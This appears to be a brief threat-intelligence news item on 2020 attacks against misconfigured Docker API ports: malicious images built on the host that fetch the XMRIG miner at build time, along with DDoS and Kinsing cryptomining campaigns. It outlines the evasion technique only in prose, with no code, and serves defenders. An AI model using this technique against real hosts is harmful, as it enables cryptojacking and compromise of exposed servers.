There has been a drastic increase in cyberattacks on cloud-native environments like Docker in recent times. To gain persistence in their attacks, hackers were recently seen exploiting misconfigured Docker API and building the attack directly on the host.

Newly observed attack

In July 2020, Aqua’s Team Nautilus cybersecurity researchers found a new type of attack on Docker images, which is very hard for defenders to detect using traditional security mechanisms like a static scanner.
  • The attacker builds a malicious image rather than pulling it from a public registry, by exploiting a misconfigured Docker API port. The attacker uses a legitimate vanilla image, such as Alpine or Ubuntu, and downloads malicious elements like XMRIG from a remote source during machine build time.
  • After the machine has spun off, the malicious attack comes from within the newly built machine living within the system, which renders the static scanner based security systems useless.
  • Unlike the traditional attacks, the images used in these attacks are not stored anywhere, so no one can take these down. In addition, the name of the image and possibly its ID is randomly generated and therefore unique to each host. So, defenders cannot add the image to a restricted list.

Other threats to Docker servers

The targeted attacks on Docker containerization technology has been observed recently have become a more frequent occurrence in last few years.
  • In June 2020, an organized series of attacks against Docker servers deployed DDoS malware variants XORDDoS, Kaiji, DOFLOO, and SDDOS and used Docker servers with exposed ports (2375) for unencrypted and unauthenticated communication.
  • In April 2020, a self-propagating crypto mining campaign targeted misconfigured open Docker Daemon API ports using Kinsing malware and ‘kdevtmpfsi’ crypto miner.


Users should use a Dynamic Threat Analysis (DTA) scanner to detect dynamic scanning cadence in cloud-native environments. Such dynamic scanners look for behavior patterns and can help the defenders to detect these kinds of attacks.

Cyware Publisher